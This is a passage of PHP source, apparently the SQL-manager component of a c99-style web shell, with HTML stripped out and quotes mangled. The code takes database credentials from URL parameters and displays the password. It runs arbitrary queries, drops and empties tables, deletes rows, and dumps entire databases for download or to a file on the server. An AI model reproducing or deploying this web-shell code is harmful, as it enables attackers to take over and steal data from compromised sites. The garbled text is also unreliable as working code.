“;} } if (count($quicklaunch) > 0) { foreach($quicklaunch as $item) { $item[1] = str_replace(“%d”,urlencode($d),$item[1]); $item[1] = str_replace(“%sort”,$sort,$item[1]); $v = realpath($d.”..”); if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} $item[1] = str_replace(“%upd”,urlencode($v),$item[1]); echo ““.$item[0].”    “; } } echo “

“; if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo “


“;} echo “

“; if ($act == “”) {$act = $dspact = “ls”;} if ($act == “sql”) { $sql_surl = $surl.”act=sql”; if ($sql_login) {$sql_surl .= “&sql_login=”.htmlspecialchars($sql_login);} if ($sql_passwd) {$sql_surl .= “&sql_passwd=”.htmlspecialchars($sql_passwd);} if ($sql_server) {$sql_surl .= “&sql_server=”.htmlspecialchars($sql_server);} if ($sql_port) {$sql_surl .= “&sql_port=”.htmlspecialchars($sql_port);} if ($sql_db) {$sql_surl .= “&sql_db=”.htmlspecialchars($sql_db);} $sql_surl .= “&”; ?>

Attention! SQL-Manager is NOT ready module! Don’t reports bugs.

“; if (!$sql_sock) {?>

SQL Manager:
“; if (!$sql_sock) { if (!$sql_server) {echo “NO CONNECTION”;} else {echo “
Can’t connect
“; echo ““.$err.”“;} } else { $sqlquicklaunch = array(); $sqlquicklaunch[] = array(“Index”,$surl.”act=sql&sql_login=”.htmlspecialchars($sql_login).”&sql_passwd=”.htmlspecialchars($sql_passwd).”&sql_server=”.htmlspecialchars($sql_server).”&sql_port=”.htmlspecialchars($sql_port).”&”); $sqlquicklaunch[] = array(“Query”,$sql_surl.”sql_act=query&sql_tbl=”.urlencode($sql_tbl)); $sqlquicklaunch[] = array(“Server-status”,$surl.”act=sql&sql_login=”.htmlspecialchars($sql_login).”&sql_passwd=”.htmlspecialchars($sql_passwd).”&sql_server=”.htmlspecialchars($sql_server).”&sql_port=”.htmlspecialchars($sql_port).”&sql_act=serverstatus”); $sqlquicklaunch[] = array(“Server variables”,$surl.”act=sql&sql_login=”.htmlspecialchars($sql_login).”&sql_passwd=”.htmlspecialchars($sql_passwd).”&sql_server=”.htmlspecialchars($sql_server).”&sql_port=”.htmlspecialchars($sql_port).”&sql_act=servervars”); $sqlquicklaunch[] = array(“Processes”,$surl.”act=sql&sql_login=”.htmlspecialchars($sql_login).”&sql_passwd=”.htmlspecialchars($sql_passwd).”&sql_server=”.htmlspecialchars($sql_server).”&sql_port=”.htmlspecialchars($sql_port).”&sql_act=processes”); $sqlquicklaunch[] = array(“Logout”,$surl.”act=sql”); echo “
MySQL “.mysql_get_server_info().” (proto v.”.mysql_get_proto_info ().”) running in “.htmlspecialchars($sql_server).”:”.htmlspecialchars($sql_port).” as “.htmlspecialchars($sql_login).”@”.htmlspecialchars($sql_server).” (password – “”.htmlspecialchars($sql_passwd).””)
“; if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo “[ “.$item[0].” ] “;}} echo “
“; } echo “

  • If login is null, login is owner of process.
  • If host is null, host is localhost
  • If port is null, port is 3306 (default)
  •  Please, fill the form:

    Username Password  Database 
    Host PORT

    “.htmlspecialchars($sql_db).” ]—
    “; $c = 0; while ($row = mysql_fetch_array($result)) {$count = mysql_query (“SELECT COUNT(*) FROM “.$row[0]); $count_row = mysql_fetch_array($count); echo “» “.htmlspecialchars($row[0]).” (“.$count_row[0].”)
    “; mysql_free_result($count); $c++;} if (!$c) {echo “No tables found in database.”;} } } else { ?>

    “.$row[0].”“; $c++;} echo ““; echo $dbs; } ?>

    Please, select database

    “; //Start center panel $diplay = TRUE; if ($sql_db) { if (!is_numeric($c)) {$c = 0;} if ($c == 0) {$c = “no”;} echo “

    There are “.$c.” table(s) in this DB (“.htmlspecialchars($sql_db).”).
    “; if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo “[ “.$item[0].” ] “;}} echo “
    “; $acts = array(“”,”dump”); if ($sql_act == “tbldrop”) {$sql_query = “DROP TABLE”; foreach($boxtbl as $v) {$sql_query .= “n`”.$v.”` ,”;} $sql_query = substr($sql_query,0,-1).”;”; $sql_act = “query”;} elseif ($sql_act == “tblempty”) {$sql_query = “”; foreach($boxtbl as $v) {$sql_query .= “DELETE FROM `”.$v.”` n”;} $sql_act = “query”;} elseif ($sql_act == “tbldump”) {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = “dump”;} elseif ($sql_act == “tblcheck”) {$sql_query = “CHECK TABLE”; foreach($boxtbl as $v) {$sql_query .= “n`”.$v.”` ,”;} $sql_query = substr($sql_query,0,-1).”;”; $sql_act = “query”;} elseif ($sql_act == “tbloptimize”) {$sql_query = “OPTIMIZE TABLE”; foreach($boxtbl as $v) {$sql_query .= “n`”.$v.”` ,”;} $sql_query = substr($sql_query,0,-1).”;”; $sql_act = “query”;} elseif ($sql_act == “tblrepair”) {$sql_query = “REPAIR TABLE”; foreach($boxtbl as $v) {$sql_query .= “n`”.$v.”` ,”;} $sql_query = substr($sql_query,0,-1).”;”; $sql_act = “query”;} elseif ($sql_act == “tblanalyze”) {$sql_query = “ANALYZE TABLE”; foreach($boxtbl as $v) {$sql_query .= “n`”.$v.”` ,”;} $sql_query = substr($sql_query,0,-1).”;”; $sql_act = “query”;} elseif ($sql_act == “deleterow”) {$sql_query = “”; if (!empty($boxrow_all)) {$sql_query = “DELETE * FROM `”.$sql_tbl.”`;”;} else {foreach($boxrow as $v) {$sql_query .= “DELETE * FROM `”.$sql_tbl.”` WHERE”.$v.” LIMIT 1;n”;} $sql_query = substr($sql_query,0,-1);} $sql_act = “query”;} elseif ($sql_tbl_act == “insert”) { if ($sql_tbl_insert_radio == 1) { $keys = “”; $akeys = array_keys($sql_tbl_insert); foreach ($akeys as $v) {$keys .= “`”.addslashes($v).”`, “;} if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} $values = “”; $i = 0; foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct.” (“;} $values .= “‘”.addslashes($v).”‘”; if ($funct) {$values .= “)”;} $values .= “, “; $i++;} if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} $sql_query = “INSERT INTO `”.$sql_tbl.”` ( “.$keys.” ) VALUES ( “.$values.” );”; $sql_act = “query”; $sql_tbl_act = “browse”; } elseif ($sql_tbl_insert_radio == 2) { $set = mysql_buildwhere($sql_tbl_insert,”, “,$sql_tbl_insert_functs); $sql_query = “UPDATE `”.$sql_tbl.”` SET “.$set.” WHERE “.$sql_tbl_insert_q.” LIMIT 1;”; $result = mysql_query($sql_query) or print(mysql_smarterror()); $result = mysql_fetch_array($result, MYSQL_ASSOC); $sql_act = “query”; $sql_tbl_act = “browse”; } } if ($sql_act == “query”) { echo “

    “; if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = “Query was empty”;} echo “Error:
    “;} if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} if ((!$submit) or ($sql_act)) {echo “

    “; if (($sql_query) and (!$submit)) {echo “Do you really want to:”;} else {echo “SQL-Query :”;} echo “


    “;} } if (in_array($sql_act,$acts)) { ?>

    Create new table:

    Dump DB:


    “;} if ($sql_act == “newtbl”) { echo ““; if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo “DB “”.htmlspecialchars($sql_newdb).”” has been created with success!
    “; } else {echo “Can’t create DB “”.htmlspecialchars($sql_newdb).””.
    Reason: “.mysql_smarterror();} } elseif ($sql_act == “dump”) { if (empty($submit)) { $diplay = FALSE; echo “


    “; echo “DB: 

    “; $v = join (“;”,$dmptbls); echo “Only tables (explode “;”) 1: 

    “; if ($dump_file) {$tmp = $dump_file;} else {$tmp = htmlspecialchars(“./dump_”.getenv(“SERVER_NAME”).”_”.$sql_db.”_”.date(“d-m-Y-H-i-s”).”.sql”);} echo “File: 

    “; echo “Download:  

    “; echo “Save to file:  “; echo “

    1 – all, if empty”; echo “

    “; } else { $diplay = TRUE; $set = array(); $set[“sock”] = $sql_sock; $set[“db”] = $sql_db; $dump_out = “download”; $set[“print”] = 0; $set[“nl2br”] = 0; $set[“”] = 0; $set[“file”] = $dump_file; $set[“add_drop”] = TRUE; $set[“onlytabs”] = array(); if (!empty($dmptbls)) {$set[“onlytabs”] = explode(“;”,$dmptbls);} $ret = mysql_dump($set); if ($sql_dump_download) { @ob_clean(); header(“Content-type: application/octet-stream”); header(“Content-length: “.strlen($ret)); header(“Content-disposition: attachment; filename=””.basename($sql_dump_file).””;”); echo $ret; exit; } elseif ($sql_dump_savetofile) { $fp = fopen($sql_dump_file,”w”); if (!$fp) {echo “Dump error! Can’t write to “”.htmlspecialchars($sql_dump_file).””!”;} else { fwrite($fp,$ret); fclose($fp); echo “Dumped! Dump has been writed to “”.htmlspecialchars(realpath($sql_dump_file)).”” (“.view_size(filesize($sql_dump_file)).”).”; } } else {echo “Dump: nothing to do!“;} } } if ($diplay) { if (!empty($sql_tbl)) { if (empty($sql_tbl_act)) {$sql_tbl_act = “browse”;} $count = mysql_query(“SELECT COUNT(*) FROM `”.$sql_tbl.”`;”); $count_row = mysql_fetch_array($count); mysql_free_result($count); $tbl_struct_result = mysql_query(“SHOW FIELDS FROM `”.$sql_tbl.”`;”); $tbl_struct_fields = array(); while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} $perpage = $sql_tbl_le – $sql_tbl_ls; if (!is_numeric($perpage)) {$perpage = 10;} $numpages = $count_row[0]/$perpage; $e = explode(” “,$sql_order); if (count($e) == 2) { if ($e[0] == “d”) {$asc_desc = “DESC”;} else {$asc_desc = “ASC”;} $v = “ORDER BY `”.$e[1].”` “.$asc_desc.” “; } else {$v = “”;} $query = “SELECT * FROM `”.$sql_tbl.”` “.$v.”LIMIT “.$sql_tbl_ls.” , “.$perpage.””; $result = mysql_query($query) or print(mysql_smarterror()); echo “

    Table “.htmlspecialchars($sql_tbl).” (“.mysql_num_fields($result).” cols and “.$count_row[0].” rows)
    “; echo “Structure ]   “; echo “Browse ]   “; echo “Dump ]   “; echo “Insert ]   “; if ($sql_tbl_act == “structure”) {echo “

    Coming sooon!“;} if ($sql_tbl_act == “insert”) { if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} if (!empty($sql_tbl_insert_radio)) { } else { echo “

    Inserting row into table:
    “; if (!empty($sql_tbl_insert_q)) { $sql_query = “SELECT * FROM `”.$sql_tbl.”`”; $sql_query .= ” WHERE”.$sql_tbl_insert_q; $sql_query .= ” LIMIT 1;”; $result = mysql_query($sql_query,$sql_sock) or print(“

    “.mysql_smarterror()); $values = mysql_fetch_assoc($result); mysql_free_result($result); } else {$values = array();} echo “

    “; foreach ($tbl_struct_fields as $field) { $name = $field[“Field”]; if (empty($sql_tbl_insert_q)) {$v = “”;} echo “

    “; $i++; } echo “

    Field Type Function Value
    “.htmlspecialchars($name).” “.$field[“Type”].”

    “; echo “Insert as new row“; if (!empty($sql_tbl_insert_q)) {echo ” or Save“; echo ““;} echo “

    “; } } if ($sql_tbl_act == “browse”) { $sql_tbl_ls = abs($sql_tbl_ls); $sql_tbl_le = abs($sql_tbl_le); echo “

    “; echo “Pages “; $b = 0; for($i=0;$i<$numpages;$i++) { if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "“;} echo $i; if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo ““;} if (($i/30 == round($i/30)) and ($i > 0)) {echo “
    “;} else {echo ” “;} } if ($i == 0) {echo “empty”;} echo “

    From:  To:  

    “; echo “

    “; echo “

    “; echo “

    “; for ($i=0;$i“; if (empty($e[0])) {$e[0] = “a”;} if ($e[1] != $v) {echo ““.$v.”“;} else {echo ““.$v.”“;} echo “

    “; } echo “

    “; echo “

    “; while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { echo “

    “; $w = “”; $i = 0; foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= ” `”.$name.”` = ‘”.addslashes($v).”‘ AND”; $i++;} if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} echo “

    “; $i = 0; foreach ($row as $k=>$v) { $v = htmlspecialchars($v); if ($v == “”) {$v = “NULL“;} echo “

    “; $i++; } echo “

    “; echo “

    “; } mysql_free_result($result); echo “

    “.$v.” “; echo “Delete “; echo “Edit “; echo “


    “; } } else { $result = mysql_query(“SHOW TABLE STATUS”, $sql_sock); if (!$result) {echo mysql_smarterror();} else { echo “

    “; $i = 0; $tsize = $trows = 0; while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { $tsize += $row[“Data_length”]; $trows += $row[“Rows”]; $size = view_size($row[“Data_length”]); echo “

    “; echo “

    “; echo “

    “; echo “

    “; echo “

    “; echo “

    “; echo “

    “; echo “

    “; echo “

    “; echo “

    “; $i++; } echo “

    “; echo “

    “; echo “

    “; echo “

    “; echo “

    “; echo “

    “; echo “

    “; echo “

    “; echo “

    “; echo “

    “; echo “

    Rows Type Created Modified Size Action
     “.$row[“Name”].”  “.$row[“Rows”].” “.$row[“Type”].” “.$row[“Create_time”].” “.$row[“Update_time”].” “.$size.”  Empty  Drop Insert 
    “.$i.” table(s)
    “.$trows.” “.$row[1].” “.$row[10].” “.$row[11].” “.view_size($tsize).”


    “; mysql_free_result($result); } } } } } else { $acts = array(“”,”newdb”,”serverstatus”,”servervars”,”processes”,”getfile”); if (in_array($sql_act,$acts)) {?>

    Create new DB:

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